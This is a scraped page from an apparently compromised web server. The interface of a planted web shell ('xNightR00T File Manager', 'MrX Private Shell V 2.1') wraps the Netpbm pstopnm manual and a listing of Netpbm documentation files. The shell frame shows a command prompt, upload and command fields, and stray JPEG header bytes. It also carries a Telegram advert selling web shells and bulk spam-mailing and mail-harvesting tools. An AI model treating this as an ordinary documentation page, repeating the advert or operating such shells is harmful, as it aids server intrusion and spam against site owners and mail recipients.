xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML><HEAD><TITLE>Pstopnm User Manual</TITLE></HEAD>
<BODY>
<H1>pstopnm</H1>
Updated: 06 December 2013
<BR>
<A HREF="#index">Table Of Contents</A>

<H2>NAME</H2>

pstopnm - convert a PostScript file to a PNM image

<H2 id="synopsis">SYNOPSIS</H2>

<B>pstopnm</B>

[<B>-stdout</B>]

[<B>-forceplain</B>]

[<B>-help</B>]

[<B>-dpi=</b><i>dpi</i>]

[<B>-xsize=</B><I>pixels</I>]
[<B>-ysize=</B><I>pixels</I>]

[<B>-xborder=</B><I>frac</I>]
[<B>-yborder=</B><I>frac</I>]
[<B>-landscape</B>]

[<B>-portrait</B>]

[<B>-nocrop</B>]

[<B>-pbm</B>

|<B>-pgm</B>

|<B>-ppm</B>]

[<B>-llx=</B><I>s</I>]
[<B>-lly=</B><I>s</I>]
[<B>-urx=</B><I>s</I>]
[<B>-ury=</B><I>s</I>]

[<B>-verbose</B>]

[<B>-xmax=</B><I>pixels</I>]
[<B>-ymax=</B><I>pixels</I>]

[<B>-textalphabits=</B>{<b>1</b>,<b>2</b>,<b>4</b>}]


<I>psfile</I>[<B>.ps</B>]

<?makeman .SH OPTION USAGE ?>
<P>Minimum unique abbreviation of option is acceptable.  You may use
double hyphens instead of single hyphen to denote options.  You may use
white space in place of the equals sign to separate an option name
from its value.

<H2 id="description">DESCRIPTION</H2>

<p>This program is part of <a href="index.html">Netpbm</a>.

<p><b>pstopnm</b> reads a PostScript file as input and produces PBM,
PGM, or PPM images as output.  This program simply uses GhostScript to
render a PostScript file with its PNM device drivers.  If you don't
have GhostScript installed or the version you have installed was not
built with the relevant PNM device drivers, <B>pstopnm</B> will fail.
You can see if you have the proper environment by issuing the command
<kbd>gs --help </kbd>.  If it responds and lists under &quot;Available
Devices&quot; <B>pbm</B>, <B>pbmraw</B>, <B>pgm</B>, <B>pgmraw</B>,
<B>pnm</B>, <B>pnmraw</B>, <B>ppm</B>, or <B>ppmraw</B>, you're in
business.

<p>It's important to understand that <b>pstopnm</b> is a Netpbm image file
format converter only in the broadest sense of the word, because Postscript is
far from an image file format.  What <b>pstopnm</b> really is is a Postscript
renderer - an image generator.  One place you'll notice the difference is
where you expect <kbd>pstopnm | pnmtops</kbd> to be idempotent (which is not
the case).  There are details on this kind of conversion below.

<P><B>pstopnm</B> uses the value of the <B>GHOSTSCRIPT</B>
environment variable as the file name for the Ghostscript program.  If
<B>GHOSTSCRIPT</B> is not set, <B>pstopnm</B> searches your
<B>PATH</B> for a regular file named <B>gs</B>.  If it doesn't find
one, it assumes Ghostscript is in the file <b>/usr/bin/gs</b>.

<P><B>pstopnm</B> does not use the Netpbm libraries to generate the
output files, so may not be entirely consistent with most Netpbm
programs.

<P><I>psfile</I>[<B>.ps</B>] is the name of the input file.
<B>pstopnm</B> will add the <B>ps</B> to the end of the name you specify if no
file exists by the exact name you specify, but one with added does.
For Standard Input, use <B>-</B> or just don't give any argument.

<P>If you use the <B>-stdout </B> option or your input is from Standard
Input, <B>pstopnm</B> outputs images of all the pages as a multi-image file to
Standard Output.  Otherwise, <B>pstopnm</B> creates one file for each page in
the Postscript input.  The files are named as follows: If the input file is
named <B>psfile.ps</B>, the name of the files will be
<B>psfile001.ppm</B>, <B>psfile002.ppm</B>, etc.  The filetype suffix
is <B>.ppm</B>, <B>.pgm</B>, or <B>.pbm</B>, depending on which kind
of output you choose with your invocation options.  If the input file
name does not end in <B>.ps</B>, the whole file name is used in the
output file name.  For example, if the input file is named
<B>psfile.old</B>, the output file name is <B>psfile.old001.ppm</B>,
etc.

<P>Note that the output file selection is inconsistent with most
Netpbm programs, because it does not default to Standard Output.  This
is for historical reasons, based on the fact that the Netpbm formats
did not always provide for a sequence of images in a single file.

<p>When your input is from Standard Input, you may feed multiple Encapsulated
Postscript documents, one after another, and <b>pstopnm</b> converts every
document and places it in the Standard Output stream as an image.  But if your
input is from a named file, <b>pstopnm</b> expects the file to be an
Encapsulated Postscript file, which means it contains only one Enapsulated
Postscript document.  If the file contains multiple concatenated
documents, <b>pstopnm</b> ignores every document but the first.  This
distinction does not exist for non-EPSF Postscript input
&mdash; <b>pstopnm</b> generates an output image for each page of the input
regardless of whether the input is from Standard Input or from a named file.

<p>Note that you can generated both kinds of files &mdash; concatenated EPSF
and multi-page non-EPSF &mdash; with <b>pnmtops</b>, selecting with the
<b>-setpage</b> option.

<p>Each output image contains a rectangular area of the page to which
it pertains.  See <a href="#dimensions">the Dimensions section</a> for
details on what part of the input image goes into the output image and
how big it is in the output and what borders and margins are in the
output image.

<P>It has been reported that on some Postscript Version 1 input,
Ghostscript, and therefore <B>pstopnm</B>, produces no output.  To
solve this problem, you can convert the file to Postscript Version 3
with the program <B>ps2ps</B>.  It is reported that the program
<B>pstops</B> does not work.

<a name="dimensions"></a>
<h3>Dimensions</h3>

<p>This section describes what part of the input image gets used in
the output and the dimensions of the output, including borders and
background.

<p>Note that an output image is associated with a single input page.

<b>pstopnm</b> starts by taking a rectangular area from the input page.
That is called the subject image.

<p><b>pstopnm</b> may add borders to the subject image to form what is called
the bordered subject image.

<p><b>pstopnm</b> places the bordered subject image in the center of
the output image and clips the edges as necessary to fit the computed
output image size.

<p>The location of the subject image in the Postscript input page is
defined by four numbers, the lower left corner and the upper right
corner x and y coordinates.  These coordinates are usually specified
by the BoundingBox DSC statement (a Postscript comment) in the
PostScript file, but they can be overridden by the user by specifying
one or more of the following options: <B>-llx</B>, <B>-lly</B>,
<B>-urx</B>, and <B>-ury</B>.

<p>The presence and thickness of a border to be added to the subject
image to form the bordered subject image is controlled by the options
<B>-xborder</B> and <B>-yborder</B>.  If <B>pstopnm</B> does not find
a BoundingBox statement in the input, and you don't specify image area
coordinates on the command line, <B>pstopnm</B> uses default values.
If your input is from Standard Input, <B>pstopnm</B> does not use the
BoundingBox values (because of the technical difficulty of extracting that
information and still feeding the file to Ghostscript), so you either
have to specify the image area coordinates or take the default.

<p>The output image size is a confusing thing.  In a Postscript file,
things have spatial dimensions.  For example, a particular line may be
3 centimeters long.  A Postscript printer is supposed to print the
line 3 centimeters long, using however many pixels that takes, without
regard to how big the sheet of paper on which it is printing is.  In a
PNM image, by contrast, there is no spatial dimension; there are only
pixels.  You might have a line that is 100 pixels long, but the PNM
image says nothing about how long that line should be on a printed
page.

<p><b>pstopnm</b> fills the role of a Postscript printer.  The PNM image
is a virtual printed page.  <b>pstopnm</b> must determine how many pixels
it will use in the output image to represent an inch of input image,
which is the "output device resolution."  Think of it as the number of
dots per inch the virtual printer prints on the virtual page.

<p>The simplest thing is for you to tell <b>pstopnm</b> exactly what
output device resolution to use, using the <b>-dpi</b> option.  If you
say for example <b>-dpi=300</b> and the bordered subject image is 2
inches by 3 inches, the PNM output will be 600 pixels by 900 pixels.
Using this method, the output device resolution has to be the same in
both directions.

<p>Or you can set the output image dimensions with <b>-xsize</b> and
<b>-ysize</b>.  For example, if you say <b>-xsize=1200 -ysize=1800</b> and the
bordered subject image is 2 inches wide by 3 inches high, the output image is
1200 by 1800 pixels, with each pixel representing 1/600 inch of input image.

<p>In the unlikely event that you want different output device resolutions in
the two directions, you could use <b>-xsize</b> and <b>-ysize</b> to do that.
In the above example, if you change <b>-ysize</b> to 900, a pixel still
represents 1/600 inch horizontally, but 1/300 inch vertically.

<p>If you specify one of <b>-xsize</b> and <b>-ysize</b> and not the
other, <b>pstopnm</b> defaults the other such that the output device
resolution is the same in both directions.

<p>The &quot;x&quot; and &quot;y&quot; of <b>-xsize</b> and <b>-ysize</b>
refer to the image being printed on the page, not the page.  So if
<b>pstopnm</b> prints it in landscape orientation, &quot;x&quot; would pertain
to the vertical direction on the page, i.e. the vertical direction in the
output PNM image.

<p>If you specify neither the output size nor the output device
resolution, <b>pstopnm</b> does some weird computation which exists
mainly for historical reasons:

<p>If you specify <b>-nocrop</b>, <b>pstopnm</b> uses the values of
<b>-xmax</b> and <b>-ymax</b> for the output image dimensions.  These
default to 612 and 792 pixels, respectively.

<p>The final case, the default, is where you don't specify any size or
resolution options or <b>-nocrop</b>.  This is the most complicated
case.  In this case, <b>pstopnm</b> first chooses an output device
resolution that would generate the number of pixels indicated by
<b>-xmax</b> and <b>-ymax</b> from the bordered subject image.  Then,
based on that resolution, it chooses an output image size that is just
large enough to accommodate the subject image (no borders).  Remember
(above) that <b>pstopnm</b> trims the edges of the bordered subject
image to fit the computed output size.


<h3 id="ghostscriptlimitations">Ghostscript Limitations</h3>

<p>Tests done in 2013 with Ghostscript 8.71 indicate that Ghostscript's
<b>pgmraw</b> output driver has some kind of rounding error that causes the
pixel values to change slightly, and that means <b>pstopnm</b> generates
incorrect output when you have monochrome Postscript input.  But with color
Postscript input, <b>pstopnm</b> uses Ghostscript's <b>ppmraw</b> output
driver and generates correct PPM output.


<h3 id="usagenotes">Usage Notes</h3>

<p>There is some good advice on converting to and from Postscript, in the
document <a href="http://mintaka.sdsu.edu/GF/bibliog/latex/PSconv.html">Postcript
File Conversions</a> by Andrew T. Young.

<h4 id="reversible">Reversible Conversion</h4>

<p>If you're trying to do the equivalent of the naive 
<kbd>pnmtops | pstopnm</kbd>, the following steps will do it.

<pre>
<kbd>
    $ pnmtops -nocenter -equalpixels -dpi 72 -noturn testimg.ppm &gt; testimg.ps
    $ pstopnm -xborder=0 -yborder=0 -xsize=<i>XSIZE</i> -ysize=<I>YSIZE</I> \
        -portrait -stdout -quiet testimg.ps &gt;testimg2.ppm
</kbd>
</pre>

<i>XSIZE</i> and <i>YSIZE</i> above are the image dimensions, which you can
get from testimg.ps like in the following example (the grep, awk and echo
commands are just to help demonstrate how the other commands work - you
wouldn't use those in a program).

<pre>
<kbd>
    $ grep "BoundingBox" testimg.ps
    %%BoundingBox: 0 0 227 149

    $ awk  '/%%BoundingBox/ {print $4,$5}' testimg.ps
     227 149
 
    $ xysize=$(awk  '/%%BoundingBox/ {print "-xsize="$4,"-ysize="$5}' testimg.ps)
    $ echo $xysize

     -xsize=227 -ysize=149

    $ pstopnm -xborder=0 -yborder=0 $xysize -portrait ... testimg.ps
</kbd>
</pre>

<p>Note that Ghostscript bugs can keep this from doing a perfect
reversible conversion.


<H2 id="options">OPTIONS</H2>

<DL COMPACT>
<DT><B>-forceplain</B>

<DD> forces the output file to be in plain (text) format.  Otherwise,
it is in raw (binary) format.  See <B><A HREF="pbm.html">pbm</A></B>,
etc.

<DT><B>-llx=</B><I>bx</I>

<DD>selects <I>bx</I> as the lower left corner x coordinate (in
inches) on the Postscript input page of the subject image.
See <a href="#dimensions">the Dimensions section</a>.

<DT><B>-lly=</B><I>by</I>

<DD>selects <I>by</I> as the lower left corner y coordinate (in inches)
on the Postscript input page of the subject image.
See <a href="#dimensions">the Dimensions section</a>.

<DT><B>-landscape</B>

<DD>renders the image in landscape orientation.  

<p>If you specify neither <b>-portrait</b> nor <b>-landscape</b>,
<b>pstopnm</b> chooses the orientation that best fits the image on the
output page.

<p>Landscape means printed sideways on the page, not printed the long way.
Those are different things if the long edge of the page is the top one.

<DT><B>-portrait</B>

<DD>renders the image in portrait orientation.

<p>See <b>-landscape</b>.

<DT><B>-nocrop</B>

<DD>This option causes <b>pstopnm</b> to make the output image
exactly the dimensions of the bordered subject image.  By default,
<b>pstopnm</b> makes the output image the dimensions specified by
<b>-xmax</b> and <b>-ymax</b>.  See <a href="#dimensions">the Dimensions
section</a>.

<DT><B>-pbm</b>
<DT><B>-pgm</B>
<DT><B>-ppm</B>

<DD>
selects the format of the output file.  By default, all files are
rendered as PPM.

<DT><B>-stdout</B>

<DD>causes output to go to Standard Output instead of to regular
files, one per page (see description of output files above).  Use
<B>pnmsplit</B> to extract individual pages from Standard Output.

<DT><B>-urx=</B><I>tx</I>

<DD>selects <I>tx</I> as the upper right corner x coordinate (in
inches) on the Postscript input page of the subject image.  See <a
href="#dimensions">the Dimensions section</a>.

<DT><B>-ury=</B><I>ty</I>

<DD>selects <I>ty</I> as the upper right corner y coordinate (in
inches) on the Postscript input page of the subject image.  See <a
href="#dimensions">the Dimensions section</a>.


<DT><B>-verbose</B>

<DD>
prints processing information to stdout.

<DT><B>-xborder=</B><I>frac</I> 

<DD>specifies that the left and right borders added to the subject
image are to be <I>frac</I> times the subject image width.  The
default value is 0.1.  See <a href="#dimensions">the Dimensions
section</a>.


<DT><B>-xmax=</B><I>xmax</I>

<DD>specifies that the output image is to be <I>xmax</I> pixels wide.
The default is 612.  See <a href="#dimensions">the Dimensions
section</a>.


<DT><B>-xsize=</B><I>xsize</I>

<DD>specifies that the output image is to be <I>xsize</I> pixels wide.
See <a href="#dimensions">the Dimensions section</a>.

<DT><B>-yborder=</B><I>frac</I>

<DD>specifies that the top and bottom borders added to the subject
image are to be <I>frac</I> times the subject image height.  The
default value is 0.1.  See <a href="#dimensions">the Dimensions
section</a>.


<DT><B>-ymax=</B><I>ymax</I>

<DD>
specifies that the output image is to be <i>ymax</i> pixels high.
The default is 792.  See <a href="#dimensions">the Dimensions
section</a>.

<DT><B>-ysize=</B><I>ysize</I>

<DD>specifies that the output image is to be <i>ymax</i> pixels high.
See <a href="#dimensions">the Dimensions section</a>.

<DT><B>-dpi=</b><i>dpi</i>

<DD>specifies the output device resolution, in dots per inch, of the
Postscript printer that <b>pstopnm</b> simulates.  This is the number of
PNM pixels <b>pstopnm</b> generates for each inch of image.
See <a href="#dimensions">the Dimensions section</a>.

<p>This option was new in Netpbm 10.21 (March 2004).
     
<dt><b>-textalphabits=</b>{<b>1</b>,<b>2</b>,<b>4</b>}

<dd>This controls subsample antialiasing of text.  Antialiasing is a form of
smoothing that eliminates jagged edges on characters.  Subsample antialiasing
is a kind of antialiasing that uses subpixels in a box, and the value of this
option is the size of that box.  4 gives you the best looking output, while 1
causes no antialiasing.  Smaller numbers make <b>pnmtops</b> use less CPU
time.

<p>Pstopnm uses Ghostscript's <b>TextAlphaBits</b> parameter for this.

<p>The default is 4.

<P>This option was new in Netpbm 10.53 (December 2010).  Older versions of
<b>pstopnm</b> do no antialiasing.

</DL>


<H2 id="limitations">LIMITATIONS</H2>

<P>The program will produce incorrect results with PostScript files that
initialize the current transformation matrix.  In these cases, page
translation and rotation will not have any effect.  To render these
files, probably the best bet is to use the following options:

<pre>
    pstopnm -xborder 0 -yborder 0 -portrait -nocrop file.ps
</pre>

<P>Additional options may be needed if the document is supposed to be
rendered on a medium different from letter-size paper.

<H2 id="seealso">SEE ALSO</H2>

<B>gs</B>,
<B><A HREF="pnmtops.html">pnmtops</A></B>,
<B><A HREF="psidtopgm.html">psidtopgm</A></B>,
<B><A HREF="pbmtolps.html">pbmtolps</A></B>,
<B><A HREF="pbmtoepsi.html">pbmtoepsi</A></B>,
<B><A HREF="pnmsplit.html">pnmsplit</A></B>,
<B>pstofits</B>



<H2 id="copyright">COPYRIGHT</H2>

<p>Copyright (c) 1992 Smithsonian Astrophysical Observatory

<p>PostScript is a Trademark of Adobe Systems Incorporated.


<H2 id="author">AUTHOR</H2>

<p>Alberto Accomazzi, WIPL, Center for Astrophysics.

<HR>
<H2 id="table">Table Of Contents</H2>
<UL>
<LI><A HREF="#synopsis">SYNOPSIS</A>
<LI><A HREF="#description">DESCRIPTION</A>
<LI><A HREF="#options">OPTIONS</A>
<LI><A HREF="#limitations">LIMITATIONS</A>
<LI><A HREF="#seealso">SEE ALSO</A>
<LI><A HREF="#copyright">COPYRIGHT</A>
<LI><A HREF="#author">AUTHOR</A>
</UL>
</BODY>
</HTML>

Filemanager

Name Type Size Permission Actions
411toppm.html File 1.76 KB 0644
anytopnm.html File 2.56 KB 0644
asciitopgm.html File 2.98 KB 0644
atktopbm.html File 945 B 0644
avstopam.html File 1.41 KB 0644
bioradtopgm.html File 1.43 KB 0644
blend1.gif File 18.25 KB 0644
blend3.gif File 21.23 KB 0644
blend4.gif File 24.56 KB 0644
blend6.gif File 21.87 KB 0644
blend7.gif File 26.28 KB 0644
bmptopnm.html File 2.16 KB 0644
bmptoppm.html File 562 B 0644
brushtopbm.html File 953 B 0644
cameratopam.html File 5.21 KB 0644
cistopbm.html File 1.36 KB 0644
cmuwmtopbm.html File 945 B 0644
ddbugtopbm.html File 3.22 KB 0644
directory.html File 34.32 KB 0644
escp2topbm.html File 2.21 KB 0644
extendedopacity.html File 6.7 KB 0644
eyuvtoppm.html File 1.1 KB 0644
faxformat.html File 3.66 KB 0644
fiascotopnm.html File 6.19 KB 0644
fitstopnm.html File 3.64 KB 0644
fstopgm.html File 1.95 KB 0644
g3topbm.html File 4.95 KB 0644
gemtopbm.html File 512 B 0644
gemtopnm.html File 1.38 KB 0644
giftopnm.html File 7.65 KB 0644
globe.jpg File 14.04 KB 0644
gobot.gif File 1.37 KB 0644
gouldtoppm.html File 911 B 0644
hdifftopam.html File 1.5 KB 0644
hipstopgm.html File 1.03 KB 0644
hpcdtoppm.html File 11.18 KB 0644
icontopbm.html File 1.2 KB 0644
ilbmtoppm.html File 3.29 KB 0644
imgtoppm.html File 1.03 KB 0644
index.html File 43.78 KB 0644
infotopam.html File 6.52 KB 0644
jbigtopnm.html File 3.91 KB 0644
jpeg2ktopam.html File 5.3 KB 0644
jpegtopnm.html File 12.51 KB 0644
leaftoppm.html File 1.1 KB 0644
liberror.html File 8.46 KB 0644
libmaketmpfile.html File 2.43 KB 0644
libmaketmpfilefd.html File 1.72 KB 0644
libnetpbm.html File 3.55 KB 0644
libnetpbm_dir.html File 9.03 KB 0644
libnetpbm_draw.html File 4.22 KB 0644
libnetpbm_image.html File 23.35 KB 0644
libnetpbm_ug.html File 11.12 KB 0644
libpbm.html File 9.43 KB 0644
libpgm.html File 7.71 KB 0644
libpm.html File 16.81 KB 0644
libpnm.html File 9.94 KB 0644
libppm.html File 26.71 KB 0644
libsystem.html File 14.36 KB 0644
libtmpfile.html File 1.71 KB 0644
libtmpfilefd.html File 1.3 KB 0644
lispmtopgm.html File 1.94 KB 0644
macptopbm.html File 1.87 KB 0644
mdatopbm.html File 1.61 KB 0644
mgrtopbm.html File 1.03 KB 0644
mrf.html File 4.3 KB 0644
mrftopbm.html File 1.54 KB 0644
mtvtoppm.html File 1.04 KB 0644
neotoppm.html File 1.18 KB 0644
palmtopnm.html File 3.54 KB 0644
pam.html File 12.22 KB 0644
pamaddnoise.html File 3.96 KB 0644
pamarith.html File 10.92 KB 0644
pambackground.html File 4.85 KB 0644
pambayer.html File 3.54 KB 0644
pamchannel.html File 2.7 KB 0644
pamcomp.html File 14.3 KB 0644
pamcut.html File 6.69 KB 0644
pamdeinterlace.html File 2.52 KB 0644
pamdepth.html File 2.47 KB 0644
pamdice.html File 4.52 KB 0644
pamditherbw.html File 6.62 KB 0644
pamedge.html File 2.24 KB 0644
pamendian.html File 2.55 KB 0644
pamenlarge.html File 3.22 KB 0644
pamexec.html File 3.15 KB 0644
pamfile.html File 2.93 KB 0644
pamfix.html File 4.7 KB 0644
pamfixtrunc.html File 1.51 KB 0644
pamflip.html File 8.43 KB 0644
pamfunc.html File 11.29 KB 0644
pamgauss.html File 3.7 KB 0644
pamgradient.html File 2.92 KB 0644
pamlookup.html File 9.54 KB 0644
pammasksharpen.html File 4.62 KB 0644
pammixinterlace.html File 3.1 KB 0644
pammosaicknit.html File 3.23 KB 0644
pamoil.html File 2.36 KB 0644
pampaintspill.html File 5.21 KB 0644
pamperspective.html File 17.28 KB 0644
pampick.html File 2.35 KB 0644
pampop9.html File 2.4 KB 0644
pamrecolor.html File 8.69 KB 0644
pamrgbatopng.html File 2.26 KB 0644
pamrubber.html File 6.43 KB 0644
pamscale.html File 25.42 KB 0644
pamseq.html File 2.77 KB 0644
pamsharpmap.html File 2.38 KB 0644
pamsharpness.html File 1.77 KB 0644
pamsistoaglyph.html File 6.65 KB 0644
pamslice.html File 4.06 KB 0644
pamsplit.html File 2.93 KB 0644
pamstack.html File 3.41 KB 0644
pamstereogram.html File 16.52 KB 0644
pamstretch-gen.html File 1.62 KB 0644
pamstretch.html File 3.72 KB 0644
pamsumm.html File 3.72 KB 0644
pamsummcol.html File 4.1 KB 0644
pamthreshold.html File 6.42 KB 0644
pamtilt.html File 4.53 KB 0644
pamtoavs.html File 1.8 KB 0644
pamtodjvurle.html File 1.78 KB 0644
pamtofits.html File 3.94 KB 0644
pamtogif.html File 13.13 KB 0644
pamtohdiff.html File 3.32 KB 0644
pamtohtmltbl.html File 2.71 KB 0644
pamtojpeg2k.html File 9.38 KB 0644
pamtompfont.html File 2.07 KB 0644
pamtooctaveimg.html File 3.21 KB 0644
pamtopam.html File 1.67 KB 0644
pamtopdbimg.html File 2.6 KB 0644
pamtopfm.html File 3.1 KB 0644
pamtopnm.html File 3.22 KB 0644
pamtosrf.html File 2.68 KB 0644
pamtosvg.html File 7.07 KB 0644
pamtotga.html File 4.42 KB 0644
pamtotiff.html File 23.6 KB 0644
pamtouil.html File 2.5 KB 0644
pamtowinicon.html File 5.02 KB 0644
pamtoxvmini.html File 1.09 KB 0644
pamundice.html File 6.94 KB 0644
pamvalidate.html File 2.19 KB 0644
pamwipeout.html File 3.08 KB 0644
pamx.html File 8.25 KB 0644
pbm.html File 6.58 KB 0644
pbmclean.html File 5.12 KB 0644
pbmlife.html File 1 KB 0644
pbmmake.html File 1.32 KB 0644
pbmmask.html File 2.89 KB 0644
pbmminkowski.html File 529 B 0644
pbmpage.html File 2.75 KB 0644
pbmpscale.html File 1.74 KB 0644
pbmreduce.html File 2.29 KB 0644
pbmtext.html File 13.69 KB 0644
pbmtextps.html File 3.46 KB 0644
pbmto10x.html File 1.37 KB 0644
pbmto4425.html File 1.75 KB 0644
pbmtoascii.html File 1.92 KB 0644
pbmtoatk.html File 934 B 0644
pbmtobbnbg.html File 1.32 KB 0644
pbmtocis.html File 1.49 KB 0644
pbmtocmuwm.html File 1.03 KB 0644
pbmtodjvurle.html File 1.18 KB 0644
pbmtoepsi.html File 3.24 KB 0644
pbmtoepson.html File 3.11 KB 0644
pbmtoescp2.html File 3.94 KB 0644
pbmtog3.html File 2.24 KB 0644
pbmtogem.html File 1.16 KB 0644
pbmtogo.html File 1.24 KB 0644
pbmtoibm23xx.html File 2.31 KB 0644
pbmtoicon.html File 1.2 KB 0644
pbmtolj.html File 3.34 KB 0644
pbmtoln03.html File 1.45 KB 0644
pbmtolps.html File 1.48 KB 0644
pbmtomacp.html File 1.81 KB 0644
pbmtomda.html File 1.75 KB 0644
pbmtomgr.html File 1.03 KB 0644
pbmtomrf.html File 1.4 KB 0644
pbmtonokia.html File 3.28 KB 0644
pbmtopgm.html File 2.47 KB 0644
pbmtopi3.html File 1.11 KB 0644
pbmtopk.html File 4.3 KB 0644
pbmtoplot.html File 1.06 KB 0644
pbmtoppa.html File 9.66 KB 0644
pbmtopsg3.html File 1.8 KB 0644
pbmtoptx.html File 1.05 KB 0644
pbmtosunicon.html File 1.02 KB 0644
pbmtowbmp.html File 1.32 KB 0644
pbmtox10bm.html File 759 B 0644
pbmtoxbm.html File 1.49 KB 0644
pbmtoybm.html File 1.13 KB 0644
pbmtozinc.html File 1.11 KB 0644
pbmupc.html File 1.91 KB 0644
pc1toppm.html File 1.13 KB 0644
pcdovtoppm.html File 2.32 KB 0644
pcxtoppm.html File 2.27 KB 0644
pdbimgtopam.html File 1.78 KB 0644
pfm.html File 3.28 KB 0644
pfmtopam.html File 1.89 KB 0644
pgm.html File 7.65 KB 0644
pgmabel.html File 3.27 KB 0644
pgmbentley.html File 1.14 KB 0644
pgmcrater.html File 7.02 KB 0644
pgmdeshadow.html File 1.89 KB 0644
pgmedge.html File 504 B 0644
pgmenhance.html File 1.53 KB 0644
pgmhist.html File 4.41 KB 0644
pgmkernel.html File 3.48 KB 0644
pgmmake.html File 1.72 KB 0644
pgmmedian.html File 3.62 KB 0644
pgmminkowski.html File 3.48 KB 0644
pgmmorphconv.html File 3.87 KB 0644
pgmnoise.html File 2 KB 0644
pgmnorm.html File 504 B 0644
pgmoil.html File 492 B 0644
pgmramp.html File 3.24 KB 0644
pgmslice.html File 478 B 0644
pgmtexture.html File 1.98 KB 0644
pgmtofs.html File 1.08 KB 0644
pgmtolispm.html File 1.81 KB 0644
pgmtopbm.html File 1.69 KB 0644
pgmtopgm.html File 1.64 KB 0644
pgmtoppm.html File 4.08 KB 0644
pi1toppm.html File 1.17 KB 0644
pi3topbm.html File 1.12 KB 0644
picttoppm.html File 5.25 KB 0644
pjtoppm.html File 1.27 KB 0644
pktopbm.html File 2.04 KB 0644
pngtopam.html File 12.06 KB 0644
pngtopnm.html File 1.87 KB 0644
pnm.html File 2.65 KB 0644
pnmalias.html File 2.81 KB 0644
pnmarith.html File 752 B 0644
pnmcat.html File 2.85 KB 0644
pnmcolormap.html File 8.08 KB 0644
pnmcomp.html File 2.05 KB 0644
pnmconvol.html File 13.66 KB 0644
pnmcrop.html File 6.18 KB 0644
pnmcut.html File 966 B 0644
pnmdepth.html File 843 B 0644
pnmfile.html File 509 B 0644
pnmflip.html File 1.06 KB 0644
pnmgamma.html File 12.02 KB 0644
pnmhisteq.html File 6.64 KB 0644
pnmhistmap.html File 5.21 KB 0644
pnmindex.html File 3.14 KB 0644
pnminterp.html File 569 B 0644
pnminvert.html File 1.27 KB 0644
pnmmargin.html File 1.77 KB 0644
pnmmercator.html File 5.44 KB 0644
pnmmontage.html File 4.65 KB 0644
pnmnlfilt.html File 7.24 KB 0644
pnmnoraw.html File 751 B 0644
pnmnorm.html File 12.08 KB 0644
pnmpad.html File 4.78 KB 0644
pnmpaste.html File 3.63 KB 0644
pnmpsnr.html File 2.1 KB 0644
pnmquant.html File 2.65 KB 0644
pnmquantall.html File 2.44 KB 0644
pnmremap.html File 10.68 KB 0644
pnmrotate.html File 4.94 KB 0644
pnmscale.html File 1.02 KB 0644
pnmscalefixed.html File 2.67 KB 0644
pnmshear.html File 3.81 KB 0644
pnmsmooth.html File 4.81 KB 0644
pnmsplit.html File 676 B 0644
pnmstitch.html File 4.03 KB 0644
pnmtile.html File 1.4 KB 0644
pnmtoddif.html File 2.26 KB 0644
pnmtofiasco.html File 10.94 KB 0644
pnmtofits.html File 495 B 0644
pnmtojbig.html File 9.61 KB 0644
pnmtojpeg.html File 21.34 KB 0644
pnmtopalm.html File 9.73 KB 0644
pnmtopclxl.html File 7.18 KB 0644
pnmtoplainpnm.html File 733 B 0644
pnmtopng.html File 18.21 KB 0644
pnmtopnm.html File 2.51 KB 0644
pnmtops.html File 18.44 KB 0644
pnmtorast.html File 1.53 KB 0644
pnmtorle.html File 3.25 KB 0644
pnmtosgi.html File 1.96 KB 0644
pnmtosir.html File 1.14 KB 0644
pnmtotiff.html File 499 B 0644
pnmtotiffcmyk.html File 7.06 KB 0644
pnmtoxwd.html File 1.69 KB 0644
ppm.html File 7.53 KB 0644
ppm3d.html File 4.29 KB 0644
ppmbrighten.html File 5.65 KB 0644
ppmchange.html File 5.5 KB 0644
ppmcie.html File 13.67 KB 0644
ppmcolormask.html File 3.95 KB 0644
ppmdcfont.html File 1.63 KB 0644
ppmddumpfont.html File 1.11 KB 0644
ppmdim.html File 1.24 KB 0644
ppmdist.html File 2.07 KB 0644
ppmdither.html File 2.39 KB 0644
ppmdmkfont.html File 1.26 KB 0644
ppmdraw.html File 8.43 KB 0644
ppmfade.html File 4.86 KB 0644
ppmflash.html File 2.04 KB 0644
ppmforge.html File 16.43 KB 0644
ppmglobe.html File 5.02 KB 0644
ppmhist.html File 5.77 KB 0644
ppmlabel.html File 5.82 KB 0644
ppmmake.html File 1.9 KB 0644
ppmmix.html File 2.21 KB 0644
ppmnorm.html File 538 B 0644
ppmntsc.html File 3.06 KB 0644
ppmpat.html File 2.99 KB 0644
ppmquant.html File 2.82 KB 0644
ppmquantall.html File 841 B 0644
ppmrainbow.html File 3.38 KB 0644
ppmrelief.html File 1.25 KB 0644
ppmrough.html File 4.85 KB 0644
ppmshadow.html File 9.94 KB 0644
ppmshift.html File 2.4 KB 0644
ppmspread.html File 1.37 KB 0644
ppmsvgalib.html File 4.55 KB 0644
ppmtoacad.html File 5.64 KB 0644
ppmtoapplevol.html File 1.34 KB 0644
ppmtoarbtxt.html File 5.09 KB 0644
ppmtoascii.html File 2.41 KB 0644
ppmtobmp.html File 3.99 KB 0644
ppmtoeyuv.html File 1.28 KB 0644
ppmtogif.html File 2.76 KB 0644
ppmtoicr.html File 3.77 KB 0644
ppmtoilbm.html File 5.25 KB 0644
ppmtojpeg.html File 590 B 0644
ppmtoleaf.html File 1.15 KB 0644
ppmtolj.html File 1.97 KB 0644
ppmtomitsu.html File 4.1 KB 0644
ppmtompeg-par.gif File 36.52 KB 0644
ppmtompeg-snr.gif File 2.3 KB 0644
ppmtompeg.html File 45.06 KB 0644
ppmtoneo.html File 1.07 KB 0644
